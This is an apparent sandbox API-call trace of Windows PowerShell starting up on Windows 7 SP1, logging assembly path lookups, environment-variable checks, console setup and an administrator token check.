	[0398.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0398.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0398.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0398.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0399.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x20d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0399.196] SetErrorMode (uMode=0x1) returned 0x1
	[0399.196] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x20db20 | out: lpFileInformation=0x20db20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0399.197] SetErrorMode (uMode=0x1) returned 0x1
	[0400.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0400.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0400.066] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0400.068] CoTaskMemAlloc (cb=0x104) returned 0x1b8a06f0
	[0400.068] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a06f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0400.068] CoTaskMemFree (pv=0x1b8a06f0) 
	[0400.071] CoTaskMemAlloc (cb=0x104) returned 0x1b8a06f0
	[0400.071] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a06f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0400.071] CoTaskMemFree (pv=0x1b8a06f0) 
	[0400.071] CoTaskMemAlloc (cb=0x104) returned 0x1b8a06f0
	[0400.071] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a06f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0400.071] CoTaskMemFree (pv=0x1b8a06f0) 
	[0400.074] CoCreateGuid (in: pguid=0x20dee8 | out: pguid=0x20dee8*(Data1=0xd64aa22f, Data2=0x956b, Data3=0x4506, Data4=([0]=0x8c, [1]=0x27, [2]=0x34, [3]=0x9f, [4]=0x4c, [5]=0x6, [6]=0x9d, [7]=0xf7))) returned 0x0
	[0400.077] CoTaskMemAlloc (cb=0x104) returned 0x1b8a06f0
	[0400.077] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a06f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0400.077] CoTaskMemFree (pv=0x1b8a06f0) 
	[0400.080] CoTaskMemAlloc (cb=0x104) returned 0x1b8a06f0
	[0400.080] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a06f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0400.080] CoTaskMemFree (pv=0x1b8a06f0) 
	[0400.568] CoTaskMemAlloc (cb=0x104) returned 0x1b8a06f0
	[0400.568] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a06f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0400.568] CoTaskMemFree (pv=0x1b8a06f0) 
	[0400.573] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0400.574] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x20db90 | out: lpConsoleScreenBufferInfo=0x20db90) returned 1
	[0400.579] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0400.579] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x20db90 | out: lpConsoleScreenBufferInfo=0x20db90) returned 1
	[0400.580] GetVersionExW (in: lpVersionInformation=0x20db20*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x20db20*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0400.583] GetCurrentProcess () returned 0xffffffffffffffff
	[0400.584] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x20dbb8 | out: TokenHandle=0x20dbb8*=0x318) returned 1
	[0400.587] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20dad8 | out: TokenInformation=0x0, ReturnLength=0x20dad8) returned 0
	[0400.588] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2b7290
	[0400.588] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x8, TokenInformation=0x2b7290, TokenInformationLength=0x4, ReturnLength=0x20dad8 | out: TokenInformation=0x2b7290, ReturnLength=0x20dad8) returned 1
	[0400.588] DuplicateTokenEx (in: hExistingToken=0x318, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x20dc38 | out: phNewToken=0x20dc38*=0x314) returned 1
	[0400.588] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20dad8 | out: TokenInformation=0x0, ReturnLength=0x20dad8) returned 0
	[0400.588] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2b72c0
	[0400.589] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x8, TokenInformation=0x2b72c0, TokenInformationLength=0x4, ReturnLength=0x20dad8 | out: TokenInformation=0x2b72c0, ReturnLength=0x20dad8) returned 1
	[0400.589] CheckTokenMembership (in: TokenHandle=0x314, SidToCheck=0x2d82b58*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x20dc48 | out: IsMember=0x20dc48) returned 1
	[0400.589] CloseHandle (hObject=0x314) returned 1
	[0400.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0400.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0400.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0400.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0401.003] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0401.003] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0401.003] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0401.007] CoTaskMemAlloc (cb=0x804) returned 0x1b8a25b0
	[0401.007] GetConsoleTitleW (in: lpConsoleTitle=0x1b8a25b0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0401.008] CoTaskMemFree (pv=0x1b8a25b0) 
	[0401.427] CoTaskMemAlloc (cb=0x804) returned 0x1b8a2e60
	[0401.427] GetConsoleTitleW (in: lpConsoleTitle=0x1b8a2e60, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0401.427] CoTaskMemFree (pv=0x1b8a2e60) 
	[0401.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0401.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0401.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0401.429] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0401.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0401.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0401.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0401.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0401.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0401.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0401.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0401.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0401.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0401.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0401.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0401.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0401.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0401.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0402.327] SetConsoleCtrlHandler (HandlerRoutine=0x2bd68dc, Add=1) returned 1
	[0402.754] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x31c
	[0402.756] CoCreateGuid (in: pguid=0x20dd30 | out: pguid=0x20dd30*(Data1=0x3cf55a6a, Data2=0xc76b, Data3=0x4818, Data4=([0]=0x91, [1]=0xa5, [2]=0xa8, [3]=0x5e, [4]=0x93, [5]=0x24, [6]=0xd8, [7]=0x67))) returned 0x0
	[0402.757] CoTaskMemAlloc (cb=0x104) returned 0x1b8a06f0
	[0402.757] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a06f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0402.757] CoTaskMemFree (pv=0x1b8a06f0) 
	[0402.777] WinSqmIsOptedIn () returned 0x0
	[0402.778] CoTaskMemAlloc (cb=0x104) returned 0x1b8a06f0
	[0402.778] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a06f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0402.778] CoTaskMemFree (pv=0x1b8a06f0) 
	[0402.778] CoTaskMemAlloc (cb=0x104) returned 0x1b8a06f0
	[0402.778] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a06f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0402.778] CoTaskMemFree (pv=0x1b8a06f0) 
	[0402.779] CoTaskMemAlloc (cb=0x104) returned 0x1b8a06f0
	[0402.779] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a06f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0402.779] CoTaskMemFree (pv=0x1b8a06f0) 
	[0402.780] CoTaskMemAlloc (cb=0x104) returned 0x1b8a06f0
	[0402.780] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a06f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0402.780] CoTaskMemFree (pv=0x1b8a06f0) 
	[0402.780] CoTaskMemAlloc (cb=0x104) returned 0x1b8a06f0
	[0402.780] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a06f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0402.780] CoTaskMemFree (pv=0x1b8a06f0) 
	[0402.781] CoTaskMemAlloc (cb=0x104) returned 0x1b8a06f0
	[0402.781] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a06f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0402.782] CoTaskMemFree (pv=0x1b8a06f0) 
	[0402.782] CoTaskMemAlloc (cb=0x104) returned 0x1b8a06f0
	[0402.782] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a06f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0402.782] CoTaskMemFree (pv=0x1b8a06f0) 
	[0402.782] CoTaskMemAlloc (cb=0x104) returned 0x1b8a06f0
	[0402.782] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a06f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0402.783] CoTaskMemFree (pv=0x1b8a06f0) 
	[0402.785] CoTaskMemAlloc (cb=0x104) returned 0x1b8a06f0
	[0402.785] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a06f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0402.785] CoTaskMemFree (pv=0x1b8a06f0) 
	[0402.789] CoTaskMemAlloc (cb=0x104) returned 0x1b8a06f0
	[0402.790] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a06f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0402.790] CoTaskMemFree (pv=0x1b8a06f0) 
	[0402.790] CoTaskMemAlloc (cb=0x104) returned 0x1b8a06f0
	[0402.790] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a06f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0402.790] CoTaskMemFree (pv=0x1b8a06f0) 
	[0402.790] CoTaskMemAlloc (cb=0x104) returned 0x1b8a06f0
	[0402.791] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a06f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0402.791] CoTaskMemFree (pv=0x1b8a06f0) 
	[0404.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0404.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0404.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
